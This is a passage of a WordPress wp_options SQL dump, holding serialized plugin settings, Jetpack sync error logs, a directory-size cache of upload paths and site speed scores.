form.\",\"id\":28031311,\"released\":\"2020-11-28 00:01:55\",\"categories\":[\"Business\",\"Business Operations\",\"Customer Service\",\"Signature\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/esthetician-consent-form\\/\",\"icon\":false,\"key\":\"esthetician-consent\",\"is_new\":false}}\";s:7:\"version\";s:5:\"6.4.1\";}','no'),
(359488,'_transient_jetpack_autoloader_plugin_paths','a:0:{}','yes'),
(359492,'jetpack_connection_active_plugins','a:1:{s:7:\"jetpack\";a:1:{s:4:\"name\";s:7:\"Jetpack\";}}','yes'),
(359495,'do_activate','0','yes'),
(359507,'_transient_jetpack_assumed_site_creation_date','2016-02-07 10:02:23','yes'),
(359552,'jetpack_plugin_api_action_links','a:16:{s:33:\"classic-editor/classic-editor.php\";a:1:{s:8:\"Settings\";s:71:\"https://gsw2023.com/wp-admin/options-writing.php#classic-editor-options\";}s:36:\"contact-form-7/wp-contact-form-7.php\";a:1:{s:8:\"Settings\";s:49:\"https://gsw2023.com/wp-admin/admin.php?page=wpcf7\";}s:27:\"convertplug/convertplug.php\";a:1:{s:8:\"Settings\";s:70:\"https://gsw2023.com/wp-admin/admin.php?page=convert-plus&view=settings\";}s:13:\"give/give.php\";a:1:{s:8:\"Settings\";s:77:\"https://gsw2023.com/wp-admin/edit.php?post_type=give_forms&page=give-settings\";}s:41:\"add-search-to-menu/add-search-to-menu.php\";a:3:{s:8:\"Settings\";s:56:\"https://gsw2023.com/wp-admin/admin.php?page=ivory-search\";s:7:\"Upgrade\";s:85:\"https://gsw2023.com/wp-admin/admin.php?billing_cycle=annual&page=ivory-search-pricing\";s:6:\"Opt In\";s:112:\"https://gsw2023.com/wp-admin/admin.php?nonce=396fe4e4fe&fs_action=add-search-to-menu_reconnect&page=ivory-search\";}s:19:\"jetpack/jetpack.php\";a:2:{s:8:\"Settings\";s:61:\"https://gsw2023.com/wp-admin/admin.php?page=jetpack#/settings\";s:7:\"Support\";s:60:\"https://gsw2023.com/wp-admin/admin.php?page=jetpack-debugger\";}s:29:\"pdf-embedder/pdf_embedder.php\";a:3:{s:8:\"Settings\";s:73:\"https://gsw2023.com/wp-admin/options-general.php?page=pdfemb_list_options\";s:6:\"Mobile\";s:97:\"http://wp-pdf.com/premium/?utm_source=Plugins%20Premium&utm_medium=freemium&utm_campaign=Freemium\";s:6:\"Secure\";s:95:\"http://wp-pdf.com/secure/?utm_source=Plugins%20Secure&utm_medium=freemium&utm_campaign=Freemium\";}s:38:\"recent-tweets-widget/recent-tweets.php\";a:1:{s:8:\"Settings\";s:57:\"https://gsw2023.com/wp-admin/admin.php?page=recent-tweets\";}s:23:\"revslider/revslider.php\";a:1:{s:10:\"Go Premium\";s:127:\"https://account.sliderrevolution.com/portal/pricing/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=buykey\";}s:29:\"dt-the7-core/dt-the7-core.php\";a:1:{s:8:\"Settings\";s:70:\"https://gsw2023.com/wp-admin/admin.php?page=of-blog-and-portfolio-menu\";}s:41:\"Ultimate_VC_Addons/Ultimate_VC_Addons.php\";a:2:{s:15:\"Video Tutorials\";s:19:\"http://bsf.io/y7ajc\";s:8:\"Settings\";s:62:\"https://gsw2023.com/wp-admin/admin.php?page=ultimate-dashboard\";}s:27:\"js_composer/js_composer.php\";a:1:{s:8:\"Settings\";s:54:\"https://gsw2023.com/wp-admin/admin.php?page=vc-general\";}s:39:\"wp-file-manager/file_folder_manager.php\";a:2:{s:7:\"Buy Pro\";s:47:\"https://filemanagerpro.io/product/file-manager/\";s:6:\"Donate\";s:54:\"http://www.webdesi9.com/donate/?plugin=wp-file-manager\";}s:24:\"wpforms-lite/wpforms.php\";a:3:{s:15:\"Get WPForms Pro\";s:146:\"https://wpforms.com/lite-upgrade/?utm_content=Get+WPForms+Pro&utm_campaign=liteplugin&utm_medium=all-plugins&utm_source=WordPress&utm_locale=en_US\";s:8:\"Settings\";s:60:\"https://gsw2023.com/wp-admin/admin.php?page=wpforms-settings\";s:4:\"Docs\";s:119:\"https://wpforms.com/docs/?utm_content=Documentation&utm_campaign=liteplugin&utm_medium=all-plugins&utm_source=WordPress\";}s:32:\"wp-google-fonts/google-fonts.php\";a:1:{s:8:\"Settings\";s:56:\"https://gsw2023.com/wp-admin/admin.php?page=google-fonts\";}s:33:\"duplicate-post/duplicate-post.php\";a:1:{s:8:\"Settings\";s:67:\"https://gsw2023.com/wp-admin/options-general.php?page=duplicatepost\";}}','yes'),
(359553,'jetpack_search_plan_info','a:3:{s:23:\"supports_instant_search\";b:0;s:28:\"supports_only_classic_search\";b:0;s:15:\"supports_search\";b:0;}','yes'),
(359616,'jpsq_sync_checkout','0:0','no'),
(359617,'jp_sync_lock_full_sync','','no'),
(359618,'jp_sync_last_success_immediate-send','1692742799.4975','no'),
(359619,'verification_services_codes','0','yes'),
(359621,'jp_sync_last_success_sync','1692778610.9278','no'),
(359627,'jp_sync_retry_after_immediate-send','','no'),
(359628,'jp_sync_error_log_immediate-send','a:5:{s:13:\"1692741971.78\";O:8:\"WP_Error\":3:{s:6:\"errors\";a:1:{s:24:\"concurrent_request_error\";a:1:{i:0;s:53:\"There is another request running for the same blog ID\";}}s:10:\"error_data\";a:1:{s:24:\"concurrent_request_error\";a:5:{s:7:\"headers\";a:10:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Tue, 22 Aug 2023 22:06:11 GMT\";s:12:\"content-type\";s:23:\"text/xml; charset=UTF-8\";s:4:\"vary\";a:2:{i:0;s:15:\"Accept-Encoding\";i:1;s:20:\"accept, content-type\";}s:8:\"x-hacker\";s:108:\"If you\'re reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.\";s:11:\"host-header\";s:13:\"WordPress.com\";s:11:\"retry-after\";s:1:\"5\";s:16:\"content-encoding\";s:4:\"gzip\";s:4:\"x-ac\";s:17:\"2.jfk _dca BYPASS\";s:25:\"strict-transport-security\";s:16:\"max-age=31536000\";}s:4:\"body\";s:461:\"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodResponse>\n  <fault>\n    <value>\n      <struct>\n        <member>\n          <name>faultCode</name>\n          <value><int>400</int></value>\n        </member>\n        <member>\n          <name>faultString</name>\n          <value><string>Jetpack: [concurrent_request_error] There is another request running for the same blog ID</string></value>\n        </member>\n      </struct>\n    </value>\n  </fault>\n</methodResponse>\n\";s:8:\"response\";a:2:{s:4:\"code\";i:200;s:7:\"message\";s:2:\"OK\";}s:7:\"cookies\";a:0:{}s:8:\"filename\";N;}}s:18:\"\0*\0additional_data\";a:1:{s:24:\"concurrent_request_error\";a:1:{i:0;i:400;}}}s:15:\"1692741971.9711\";O:8:\"WP_Error\":3:{s:6:\"errors\";a:1:{s:24:\"concurrent_request_error\";a:1:{i:0;s:53:\"There is another request running for the same blog ID\";}}s:10:\"error_data\";a:1:{s:24:\"concurrent_request_error\";a:5:{s:7:\"headers\";a:10:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Tue, 22 Aug 2023 22:06:11 GMT\";s:12:\"content-type\";s:23:\"text/xml; charset=UTF-8\";s:4:\"vary\";a:2:{i:0;s:15:\"Accept-Encoding\";i:1;s:20:\"accept, content-type\";}s:8:\"x-hacker\";s:108:\"If you\'re reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.\";s:11:\"host-header\";s:13:\"WordPress.com\";s:11:\"retry-after\";s:1:\"5\";s:16:\"content-encoding\";s:4:\"gzip\";s:4:\"x-ac\";s:17:\"2.jfk _dca BYPASS\";s:25:\"strict-transport-security\";s:16:\"max-age=31536000\";}s:4:\"body\";s:461:\"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodResponse>\n  <fault>\n    <value>\n      <struct>\n        <member>\n          <name>faultCode</name>\n          <value><int>400</int></value>\n        </member>\n        <member>\n          <name>faultString</name>\n          <value><string>Jetpack: [concurrent_request_error] There is another request running for the same blog ID</string></value>\n        </member>\n      </struct>\n    </value>\n  </fault>\n</methodResponse>\n\";s:8:\"response\";a:2:{s:4:\"code\";i:200;s:7:\"message\";s:2:\"OK\";}s:7:\"cookies\";a:0:{}s:8:\"filename\";N;}}s:18:\"\0*\0additional_data\";a:1:{s:24:\"concurrent_request_error\";a:1:{i:0;i:400;}}}s:15:\"1692741972.2379\";O:8:\"WP_Error\":3:{s:6:\"errors\";a:1:{s:24:\"concurrent_request_error\";a:1:{i:0;s:53:\"There is another request running for the same blog ID\";}}s:10:\"error_data\";a:1:{s:24:\"concurrent_request_error\";a:5:{s:7:\"headers\";a:10:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Tue, 22 Aug 2023 22:06:12 GMT\";s:12:\"content-type\";s:23:\"text/xml; charset=UTF-8\";s:4:\"vary\";a:2:{i:0;s:15:\"Accept-Encoding\";i:1;s:20:\"accept, content-type\";}s:8:\"x-hacker\";s:108:\"If you\'re reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.\";s:11:\"host-header\";s:13:\"WordPress.com\";s:11:\"retry-after\";s:1:\"5\";s:16:\"content-encoding\";s:4:\"gzip\";s:4:\"x-ac\";s:17:\"2.jfk _dca BYPASS\";s:25:\"strict-transport-security\";s:16:\"max-age=31536000\";}s:4:\"body\";s:461:\"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodResponse>\n  <fault>\n    <value>\n      <struct>\n        <member>\n          <name>faultCode</name>\n          <value><int>400</int></value>\n        </member>\n        <member>\n          <name>faultString</name>\n          <value><string>Jetpack: [concurrent_request_error] There is another request running for the same blog ID</string></value>\n        </member>\n      </struct>\n    </value>\n  </fault>\n</methodResponse>\n\";s:8:\"response\";a:2:{s:4:\"code\";i:200;s:7:\"message\";s:2:\"OK\";}s:7:\"cookies\";a:0:{}s:8:\"filename\";N;}}s:18:\"\0*\0additional_data\";a:1:{s:24:\"concurrent_request_error\";a:1:{i:0;i:400;}}}s:15:\"1692742338.2455\";O:8:\"WP_Error\":3:{s:6:\"errors\";a:1:{s:24:\"concurrent_request_error\";a:1:{i:0;s:53:\"There is another request running for the same blog ID\";}}s:10:\"error_data\";a:1:{s:24:\"concurrent_request_error\";a:5:{s:7:\"headers\";a:10:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Tue, 22 Aug 2023 22:12:18 GMT\";s:12:\"content-type\";s:23:\"text/xml; charset=UTF-8\";s:4:\"vary\";a:2:{i:0;s:15:\"Accept-Encoding\";i:1;s:20:\"accept, content-type\";}s:8:\"x-hacker\";s:108:\"If you\'re reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.\";s:11:\"host-header\";s:13:\"WordPress.com\";s:11:\"retry-after\";s:1:\"5\";s:16:\"content-encoding\";s:4:\"gzip\";s:4:\"x-ac\";s:17:\"2.jfk _dca BYPASS\";s:25:\"strict-transport-security\";s:16:\"max-age=31536000\";}s:4:\"body\";s:461:\"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodResponse>\n  <fault>\n    <value>\n      <struct>\n        <member>\n          <name>faultCode</name>\n          <value><int>400</int></value>\n        </member>\n        <member>\n          <name>faultString</name>\n          <value><string>Jetpack: [concurrent_request_error] There is another request running for the same blog ID</string></value>\n        </member>\n      </struct>\n    </value>\n  </fault>\n</methodResponse>\n\";s:8:\"response\";a:2:{s:4:\"code\";i:200;s:7:\"message\";s:2:\"OK\";}s:7:\"cookies\";a:0:{}s:8:\"filename\";N;}}s:18:\"\0*\0additional_data\";a:1:{s:24:\"concurrent_request_error\";a:1:{i:0;i:400;}}}s:14:\"1692742574.449\";O:8:\"WP_Error\":3:{s:6:\"errors\";a:1:{s:24:\"concurrent_request_error\";a:1:{i:0;s:53:\"There is another request running for the same blog ID\";}}s:10:\"error_data\";a:1:{s:24:\"concurrent_request_error\";a:5:{s:7:\"headers\";a:10:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Tue, 22 Aug 2023 22:16:14 GMT\";s:12:\"content-type\";s:23:\"text/xml; charset=UTF-8\";s:4:\"vary\";a:2:{i:0;s:15:\"Accept-Encoding\";i:1;s:20:\"accept, content-type\";}s:8:\"x-hacker\";s:108:\"If you\'re reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.\";s:11:\"host-header\";s:13:\"WordPress.com\";s:11:\"retry-after\";s:1:\"5\";s:16:\"content-encoding\";s:4:\"gzip\";s:4:\"x-ac\";s:17:\"2.jfk _dca BYPASS\";s:25:\"strict-transport-security\";s:16:\"max-age=31536000\";}s:4:\"body\";s:461:\"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodResponse>\n  <fault>\n    <value>\n      <struct>\n        <member>\n          <name>faultCode</name>\n          <value><int>400</int></value>\n        </member>\n        <member>\n          <name>faultString</name>\n          <value><string>Jetpack: [concurrent_request_error] There is another request running for the same blog ID</string></value>\n        </member>\n      </struct>\n    </value>\n  </fault>\n</methodResponse>\n\";s:8:\"response\";a:2:{s:4:\"code\";i:200;s:7:\"message\";s:2:\"OK\";}s:7:\"cookies\";a:0:{}s:8:\"filename\";N;}}s:18:\"\0*\0additional_data\";a:1:{s:24:\"concurrent_request_error\";a:1:{i:0;i:400;}}}}','yes'),
(359645,'_transient_dirsize_cache','a:105:{s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2016/01\";i:410932;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2016/02\";i:731143;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2016/11\";i:17245956;s:69:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2016/dir\";i:65348;s:65:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2016\";i:18453516;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2017/01\";i:3868801;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2017/02\";i:137838;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2017/03\";i:22584;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2017/11\";i:119553;s:73:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2017/dir/dir\";i:13426;s:69:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2017/dir\";i:62511;s:65:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2017\";i:4211424;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2018/01\";i:235995;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2018/02\";i:168826;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2018/06\";i:7949220;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2018/10\";i:12469865;s:72:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2018/12/dir\";i:3284;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2018/12\";i:147389;s:69:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2018/dir\";i:49219;s:65:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2018\";i:21020651;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2019/01\";i:135958;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2019/02\";i:175465;s:72:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2019/03/dir\";i:250208;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2019/03\";i:404347;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2019/05\";i:505895;s:72:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2019/06/dir\";i:65348;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2019/06\";i:1266680;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2019/07\";i:125340;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2019/08\";i:50717;s:72:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2019/10/dir\";i:65348;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2019/10\";i:587823;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2019/11\";i:101341;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2019/12\";i:372063;s:65:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2019\";i:3725766;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2020/01\";i:197433;s:72:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2020/02/dir\";i:14733;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2020/02\";i:638819;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2020/03\";i:634578;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2020/04\";i:405547;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2020/05\";i:623859;s:65:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2020\";i:2500373;s:72:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2021/06/dir\";i:65348;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2021/06\";i:335814;s:65:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2021\";i:335951;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2022/10\";i:26036296;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2022/11\";i:113626991;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2022/12\";i:5803106;s:65:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2022\";i:145466530;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2023/01\";i:8407958;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2023/02\";i:4977968;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2023/03\";i:18327952;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2023/04\";i:14661842;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2023/05\";i:3157737;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2023/06\";i:16423888;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2023/07\";i:8696753;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2023/08\";i:26937030;s:65:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/2023\";i:101591265;s:80:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/convertplus_uploads\";i:137;s:74:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/elementor/css\";i:18560;s:70:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/elementor\";i:18697;s:72:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/js_composer\";i:566037;s:65:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/mphb\";i:165;s:85:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/revslider/objects/thumbs\";i:218933;s:78:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/revslider/objects\";i:219070;s:100:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/revslider/templates/404-page-collection\";i:5974;s:109:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/revslider/templates/beach-events-hero-collection\";i:16746;s:105:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/revslider/templates/charts-template-showcase\";i:6491;s:90:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/revslider/templates/cyberfunk\";i:14469;s:102:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/revslider/templates/ecommerce-sale-slider\";i:27161;s:100:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/revslider/templates/fashion-shop-slider\";i:21766;s:107:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/revslider/templates/fitness-gym-website-slider\";i:12774;s:105:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/revslider/templates/furniture-website-slider\";i:10931;s:110:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/revslider/templates/lingerie-store-website-slider\";i:7660;s:114:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/revslider/templates/minimal-typography-website-slider\";i:8960;s:102:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/revslider/templates/motion-blur-portfolio\";i:8454;s:107:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/revslider/templates/Optic-shop-showcase-slider\";i:6911;s:89:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/revslider/templates/packages\";i:369740;s:99:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/revslider/templates/portal-effect-hero\";i:12298;s:109:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/revslider/templates/solar-system-showcase-slider\";i:7802;s:98:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/revslider/templates/video-hero-header\";i:10611;s:97:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/revslider/templates/visual-art-forms\";i:7000;s:80:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/revslider/templates\";i:555885;s:99:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/revslider/the7-software-company-slider\";i:1300090;s:70:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/revslider\";i:2075182;s:79:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/seedprod-help-docs\";i:12371;s:76:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/smile_fonts/dir\";i:188351;s:98:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/smile_fonts/icomoon-fontawesome-16x16\";i:1611002;s:72:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/smile_fonts\";i:1799490;s:76:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/the7-css/legacy\";i:211657;s:69:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/the7-css\";i:644530;s:94:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/the7-demo-content-tmp/old-landing\";i:1103052;s:82:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/the7-demo-content-tmp\";i:1199654;s:72:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/ur-logs/dir\";i:12869;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/ur-logs\";i:13006;s:71:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/useanyfont\";i:181792;s:90:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/user_registration_uploads/dir\";i:30704;s:103:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/user_registration_uploads/profile-pictures\";i:137;s:86:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/user_registration_uploads\";i:30978;s:90:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/wp-file-manager-pro/fm_backup\";i:137;s:80:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/wp-file-manager-pro\";i:274;s:74:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/wpcf7_uploads\";i:137;s:84:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/wpforms/cache/templates\";i:4715;s:74:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/wpforms/cache\";i:766364;s:68:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads/wpforms\";i:766501;s:60:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads\";i:304614564;}','yes'),
(359654,'trusted_ip_header','O:8:\"stdClass\":3:{s:14:\"trusted_header\";s:11:\"REMOTE_ADDR\";s:8:\"segments\";i:1;s:7:\"reverse\";b:0;}','no'),
(359715,'post_by_email_address1','NULL','yes'),
(359730,'jp_sync_error_log_sync','a:1:{s:15:\"1692742182.7705\";O:8:\"WP_Error\":3:{s:6:\"errors\";a:1:{s:24:\"concurrent_request_error\";a:1:{i:0;s:53:\"There is another request running for the same blog ID\";}}s:10:\"error_data\";a:1:{s:24:\"concurrent_request_error\";a:5:{s:7:\"headers\";a:10:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Tue, 22 Aug 2023 22:09:42 GMT\";s:12:\"content-type\";s:23:\"text/xml; charset=UTF-8\";s:4:\"vary\";a:2:{i:0;s:15:\"Accept-Encoding\";i:1;s:20:\"accept, content-type\";}s:8:\"x-hacker\";s:108:\"If you\'re reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.\";s:11:\"host-header\";s:13:\"WordPress.com\";s:11:\"retry-after\";s:1:\"1\";s:16:\"content-encoding\";s:4:\"gzip\";s:4:\"x-ac\";s:17:\"2.jfk _dca BYPASS\";s:25:\"strict-transport-security\";s:16:\"max-age=31536000\";}s:4:\"body\";s:461:\"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodResponse>\n  <fault>\n    <value>\n      <struct>\n        <member>\n          <name>faultCode</name>\n          <value><int>400</int></value>\n        </member>\n        <member>\n          <name>faultString</name>\n          <value><string>Jetpack: [concurrent_request_error] There is another request running for the same blog ID</string></value>\n        </member>\n      </struct>\n    </value>\n  </fault>\n</methodResponse>\n\";s:8:\"response\";a:2:{s:4:\"code\";i:200;s:7:\"message\";s:2:\"OK\";}s:7:\"cookies\";a:0:{}s:8:\"filename\";N;}}s:18:\"\0*\0additional_data\";a:1:{s:24:\"concurrent_request_error\";a:1:{i:0;i:400;}}}}','yes'),
(359807,'monitor_receive_notifications','1','yes'),
(359810,'jb_transient_jetpack_boost_speed_scores_33784f228e98c611035f5da08d34d95c','a:2:{s:6:\"expire\";i:1692742703;s:4:\"data\";a:8:{s:2:\"id\";s:32:\"33784f228e98c611035f5da08d34d95c\";s:3:\"url\";s:11:\"gsw2023.com\";s:14:\"active_modules\";a:0:{}s:7:\"created\";d:1692742369.897164;s:6:\"status\";s:7:\"success\";s:5:\"error\";N;s:6:\"client\";s:17:\"jetpack-dashboard\";s:11:\"retry_count\";i:0;}}','no'),
(359818,'dismiss_empty_stats_card','1','yes'),
(359820,'jetpack_boost_speed_score_history_33784f228e98c611035f5da08d34d95c','a:1:{i:0;a:3:{s:9:\"timestamp\";i:1692742403;s:6:\"scores\";O:8:\"stdClass\":2:{s:6:\"mobile\";i:26;s:7:\"desktop\";i:61;}s:5:\"theme\";s:4:\"The7\";}}','no'),
